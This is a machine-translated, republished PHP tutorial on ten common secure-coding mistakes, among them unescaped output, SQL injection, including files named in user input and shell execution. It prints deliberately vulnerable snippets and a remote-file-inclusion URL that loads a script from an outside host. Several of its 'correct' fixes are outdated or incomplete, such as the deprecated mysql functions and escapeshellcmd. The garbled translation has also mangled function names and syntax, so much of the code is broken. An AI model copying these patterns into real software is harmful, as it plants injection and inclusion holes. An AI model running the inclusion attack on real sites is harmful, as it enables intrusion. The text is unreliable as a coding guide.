PHP easy to make mistakes when writing secure Code _php tutorial

Source: Internet
Author: User
Tags learn php ways to prevent sql injection
1. Do not turn to HTML entities
A basic common sense: all untrusted input (especially the data submitted by the user from the form), and the output should be preceded by a change of meaning.
echo $_get[' Usename '];
This example has the potential to output:

This is an obvious security risk unless you ensure that your users are correctly entered.
How to FIX:
We need to convert the "<", ">", "and" to the correct HTML representation (<, > ', and "), and the Functions Htmlspecialchars and htmlentities () are just doing the work.
The right way:
echo htmlspecialchars ($_get[' username '), ent_quotes);
2. Do not switch to SQL input
I have discussed this problem in one of the simplest ways to prevent SQL injection (in php+mysql) and have given a simple method. Someone told me that they had set magic_quotes to on in php.ini, so don't worry about it, but not all the inputs are from $_get, $_post or $_cookie!
How to FIX:
And in the simplest way to prevent SQL injection (in php+mysql) I recommend using the mysql_real_escape_string () function
Correct practice:
Copy CodeThe code is as follows:
$sql = "UPDATE users SET
Name= '. mysql_real_escape_string ($name). '
WHERE id= '. mysql_real_escape_string ($id). ";
mysql_query ($sql);
?>

3. Incorrect use of Http-header related functions: Header (), Session_Start (), Setcookie ()
Have you encountered this warning? " Warning:cannot Add header information-headers already sent [....]

Each time a webpage is downloaded from the server, the server's output is divided into two parts: the head and the body.
The head contains some non-visual data, such as a cookie. The head always arrives first. The body part includes visual HTML, pictures and other data.
If Output_buffering is set to OFF, all http-header-related functions must be called before the output is available. The problem is that you develop in one environment, and when you deploy to another environment, the output_buffering settings may not be the same. The result turns to stop, and neither the cookie nor the session is set correctly ....

How to FIX:
Ensure that Http-header related functions are called before the output and that output_buffering = Off

4. Require or include files that use unsafe data
Again: Don't trust data that is not explicitly declared by yourself. Do not Include or require files obtained from $_get, $_post, or $_cookie.
For example:
Copy CodeThe code is as follows:
index.php
Including header, config, database connection, etc
Include ($_get[' filename ');
including footer
?>

Now any hacker can now use: http://www.yourdomain.com/index.php?filename=anyfile.txt
To get your confidential information, or execute a PHP script.
If Allow_url_fopen=on, you are more dead:
Try this input:
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php
Now your page contains the output of the http://www.youaredoomed.com/phphack.php. Hackers can send spam messages, change passwords, delete files, and more. As long as you want to.
How to FIX:
You must control which files can be included in the include or require directives yourself.
Here's a quick, but not comprehensive, workaround:
Copy CodeThe code is as follows:
The Include only files, that is allowed.
$allowedFiles = Array (' file1.txt ', ' file2.txt ', ' file3.txt ');
if (In_array (string) $_get[' filename '], $allowedFiles)) {
Include ($_get[' filename ');
}
else{
Exit (' not allowed ');
}
?>

5. Syntax Errors
Grammatical errors include all lexical and grammatical errors, so common that I have to list them here. The solution is to seriously learn PHP syntax, carefully do not miss a parenthesis, curly braces, semicolons, quotation marks. There is also a good editor, do not use Notepad!
6. Rarely used or not object-oriented
Many projects do not use PHP's object-oriented technology, the result is that the maintenance of code is very time consuming. PHP supports a growing number of object-oriented technologies and is getting better, and there's no reason to not use object-oriented.
7. Do not use the framework
95% of PHP projects are doing the same four things: Create, edit, list, and delete. Now there are a lot of MVC frameworks to help us do these four things, why don't we use them?
8. Do not know what functionality is available in PHP
PHP's core contains many features. Many programmers repeat the invention of the wheel. Wasted a lot of time. Code before you search PHP mamual, Google search, there may be new discoveries! The exec () in PHP is a powerful function that executes the CMD shell and returns the last line of the execution result as a string. Considering the safety can be used Escapeshellcmd ()
9. Using older versions of PHP
Many programmers are still using PHP4, the development of PHP4 can not fully play the potential of PHP, there are some security risks. Go to PHP5, it doesn't cost a lot. Most PHP4 programs can be migrated to PHP5 without changes or changes. According to Http://www.nexen.net's survey only 12% of PHP servers use PHP5, so 88% of PHP developers are still using PHP4.
10. Two times the quotation marks
Have you seen \ ' or \ ' in the Web page? This is usually because magic_quotes is set to off in the developer's environment and Magic_quotes =on on the deployed server. PHP will run Addslashes () repeatedly on the data in GET, POST and Cookie.
Original text:
It ' s A string

Magic Quotes on:
It\ ' s A string
Run once again
Addslashes ():
It\\ ' s A string

HTML output:
It\ ' s A string

Another situation is that the user initially entered the wrong login information, the server detects the wrong input, the output of the same form requires the user to enter again, resulting in user input two times!

http://www.bkjia.com/PHPjc/321875.html www.bkjia.com true http://www.bkjia.com/PHPjc/321875.html techarticle 1. Do not turn to HTML entities a basic common sense: all untrusted input (especially the data submitted by the user from the form), will be transferred before the output. echo $_get[' Usename ']; This ...

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.